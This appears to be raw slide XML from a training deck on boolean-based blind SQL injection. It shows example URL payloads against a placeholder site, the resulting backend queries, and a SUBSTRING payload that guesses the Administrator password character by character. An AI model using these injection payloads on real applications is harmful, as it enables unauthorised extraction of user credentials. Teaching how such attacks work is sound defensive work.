              <a:rPr dirty="0" sz="2850" spc="-100">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Query:</a:t>
            </a:r>
            <a:endParaRPr sz="2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5199" y="6611401"/>
            <a:ext cx="16341090" cy="39370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8575" rIns="0" bIns="0" rtlCol="0" vert="horz">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="452120">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="225"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="1459865" algn="l"/>
                <a:tab pos="2324100" algn="l"/>
                <a:tab pos="3044190" algn="l"/>
                <a:tab pos="4196715" algn="l"/>
                <a:tab pos="5060315" algn="l"/>
                <a:tab pos="5492750" algn="l"/>
                <a:tab pos="5924550" algn="l"/>
                <a:tab pos="6500495" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="240">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>select	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="495">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>title	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="105">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>from	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="155">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>product	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="15">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>where	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="335">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>id	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="-40">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>=1	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="-10">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>and	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="-30">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>1=2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7889" y="7305612"/>
            <a:ext cx="2698750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50" spc="-170">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Payload </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2850" spc="-140">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>#2</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2850" spc="-175">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2850" spc="-125">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>(True):</a:t>
            </a:r>
            <a:endParaRPr sz="2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5199" y="7920680"/>
            <a:ext cx="16341090" cy="39370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8575" rIns="0" bIns="0" rtlCol="0" vert="horz">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="452120">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="225"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="4483100" algn="l"/>
                <a:tab pos="5059680" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="40">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>www.random.com/app.php?id=1</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="40">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="-10">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>and	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="-30">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>1=1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7889" y="8481701"/>
            <a:ext cx="2372360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50" spc="-185">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Backend</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2850" spc="-190">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2850" spc="-100">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Query:</a:t>
            </a:r>
            <a:endParaRPr sz="2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5199" y="9229969"/>
            <a:ext cx="16341090" cy="39370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8575" rIns="0" bIns="0" rtlCol="0" vert="horz">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="452120">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="225"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="1459865" algn="l"/>
                <a:tab pos="2324100" algn="l"/>
                <a:tab pos="3044190" algn="l"/>
                <a:tab pos="4196715" algn="l"/>
                <a:tab pos="5060315" algn="l"/>
                <a:tab pos="5492750" algn="l"/>
                <a:tab pos="5924550" algn="l"/>
                <a:tab pos="6500495" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="240">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>select	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="495">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>title	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="105">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>from	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="155">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>product	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="15">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>where	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="335">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>id	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="-40">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>=1	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="-10">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>and	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="-30">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>1=1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951500"/>
            <a:ext cx="9455150" cy="11099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100" spc="-215"/>
              <a:t>Boolean-Based </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="7100" spc="-275"/>
              <a:t>Blind</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="7100" spc="-790"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="7100" spc="-270"/>
              <a:t>SQLi</a:t>
            </a:r>
            <a:endParaRPr sz="71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09639" y="5798168"/>
            <a:ext cx="16366490" cy="7105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6034" rIns="0" bIns="0" rtlCol="0" vert="horz">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="477520" marR="2054860">
              <a:lnSpc>
                <a:spcPct val="100499"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="204"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="1485900" algn="l"/>
                <a:tab pos="2349500" algn="l"/>
                <a:tab pos="3069590" algn="l"/>
                <a:tab pos="3502025" algn="l"/>
                <a:tab pos="3933825" algn="l"/>
                <a:tab pos="4222115" algn="l"/>
                <a:tab pos="5086350" algn="l"/>
                <a:tab pos="5518150" algn="l"/>
                <a:tab pos="5949950" algn="l"/>
                <a:tab pos="6526530" algn="l"/>
                <a:tab pos="9118600" algn="l"/>
                <a:tab pos="10414635" algn="l"/>
                <a:tab pos="11134725" algn="l"/>
                <a:tab pos="11998960" algn="l"/>
                <a:tab pos="12863195" algn="l"/>
                <a:tab pos="14159230" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="240">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>select</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="240">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="495">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>title</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="495">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="105">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>from</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="105">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="155">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>product</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="155">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="15">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>where</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="15">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="335">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>id</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="335">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="-40">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>=1</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="-40">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="-10">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>and</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="-10">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="-120">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>SUBSTRING((SELECT</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="-120">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="5">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Password</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="5">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="-380">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>FROM</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="-380">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="60">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Users</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="60">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="-395">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>WHERE</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="-395">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="-50">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Username</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="-50">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="-45">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>=  </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="300">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>'Administrator'),	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="275">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>1,	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="220">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>1)	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="-65">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>=	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="530">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>'s'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7889" y="3503423"/>
            <a:ext cx="1285875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50" spc="-475">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>P</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2850" spc="-260">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2850" spc="-120">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>y</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2850" spc="20">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>l</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2850" spc="-65">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>o</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2850" spc="-210">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2850" spc="-50">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>d: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7889" y="5222324"/>
            <a:ext cx="2372360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50" spc="-185">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Backend</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2850" spc="-190">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2850" spc="-100">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Query:</a:t>
            </a:r>
            <a:endParaRPr sz="2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9639" y="2884352"/>
            <a:ext cx="16366490" cy="39370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9209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229"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="2117090" algn="l"/>
                <a:tab pos="2404745" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="200">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Administrator	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="560">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>/	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="25">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>e3c33e889e0e1b62cb7f65c63b60c42bd77275d0e730432fc37b7e624b09ad1f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7889" y="2194144"/>
            <a:ext cx="1816735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50" spc="-190">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Users</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2850" spc="-200">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2850" spc="-170">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Table:</a:t>
            </a:r>
            <a:endParaRPr sz="2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9639" y="4181841"/>
            <a:ext cx="16366490" cy="7105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6670" rIns="0" bIns="0" rtlCol="0" vert="horz">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="477520" marR="471805">
              <a:lnSpc>
                <a:spcPct val="100499"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="210"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="909319" algn="l"/>
                <a:tab pos="1197610" algn="l"/>
                <a:tab pos="4509135" algn="l"/>
                <a:tab pos="5085080" algn="l"/>
                <a:tab pos="7677150" algn="l"/>
                <a:tab pos="8973820" algn="l"/>
                <a:tab pos="9693910" algn="l"/>
                <a:tab pos="10557510" algn="l"/>
                <a:tab pos="11421745" algn="l"/>
                <a:tab pos="12717780" algn="l"/>
                <a:tab pos="13006069" algn="l"/>
                <a:tab pos="15598775" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="-40">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>www.random.com</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="560">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="114">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>app.php?id</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="-40">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>=1</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="-40">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="-10">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>and</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="-10">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="-120">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>SUBSTRING((SELECT</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="-120">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="5">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Password</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="5">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="-380">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>FROM</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="-380">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="60">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Users</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="60">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="-395">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>WHERE</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="-395">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="-50">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Username</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="-50">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="-65">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="-65">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="300">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>'Administrator'),</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="300">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="229">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>1,  </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="220">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>1)	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="-65">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>=	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="530">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>'s'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35199" y="6786819"/>
            <a:ext cx="762000" cy="188595"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="762000" h="188595">
                <a:moveTo>
                  <a:pt x="573375" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="573375" y="188475"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="699025" y="125650"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="604787" y="125650"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="604787" y="62825"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="699025" y="62825"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="573375" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="762000" h="188595">
                <a:moveTo>
                  <a:pt x="573375" y="62825"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="62825"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="125650"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="573375" y="125650"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="573375" y="62825"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="762000" h="188595">
                <a:moveTo>
                  <a:pt x="699025" y="62825"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="604787" y="62825"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="604787" y="125650"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="699025" y="125650"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="761851" y="94237"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="699025" y="62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36130" y="6796358"/>
            <a:ext cx="762000" cy="188595"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="762000" h="188595">
                <a:moveTo>
                  <a:pt x="573375" y="125650"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="573375" y="188475"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="699025" y="125650"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="573375" y="125650"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="762000" h="188595">
                <a:moveTo>
                  <a:pt x="573375" y="62824"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="573375" y="125650"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="604787" y="125650"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="604787" y="62825"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="573375" y="62824"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="762000" h="188595">
                <a:moveTo>
                  <a:pt x="573375" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="573375" y="62824"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="604787" y="62825"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="604787" y="125650"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="699046" y="125640"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="761851" y="94237"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="573375" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="762000" h="188595">
                <a:moveTo>
                  <a:pt x="0" y="62814"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="125640"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="573375" y="125650"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="573375" y="62824"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="62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72330" y="6731387"/>
            <a:ext cx="5993130" cy="984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01065">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
